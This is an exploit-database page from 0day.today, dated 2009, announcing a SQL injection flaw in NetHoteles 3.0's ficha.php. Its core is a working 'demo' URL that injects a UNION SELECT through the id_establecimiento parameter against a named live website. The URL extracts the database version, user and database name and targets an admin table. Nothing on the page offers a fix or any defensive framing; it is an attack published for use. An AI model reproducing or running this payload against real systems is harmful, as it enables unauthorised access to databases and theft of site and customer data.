[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

NetHoteles 3.0 (ficha.php) SQL Injection Vulnerability

Author
Snakespc
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5051
Category
web applications
Date add
15-04-2009
Platform
unsorted
======================================================
NetHoteles 3.0 (ficha.php) SQL Injection Vulnerability 
======================================================


--------------------------------------------------------
NetHoteles v3.0  (ficha.php) SQL Injection Vulnerability 
--------------------------------------------------------
Discovered By: Snakespc     ALGERIAN HaCkEr 
Site:http://www.snakespc.com/sc/index.php
--------------------------------------------------------
Script:
http://www.sierracazorla.com
--------------------------------------------------------
Exploit:
-----------
Demo:
http://www.sierracazorla.com/nethoteles/publico/ficha.php?id_establecimiento=-13%27+UNION%20SELECT%201,2,3,4,5,6,concat(@@version,0x3a,user(),0x3a,database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+admin/*
----------------------------------------------------------




#  0day.today [2024-12-27]  #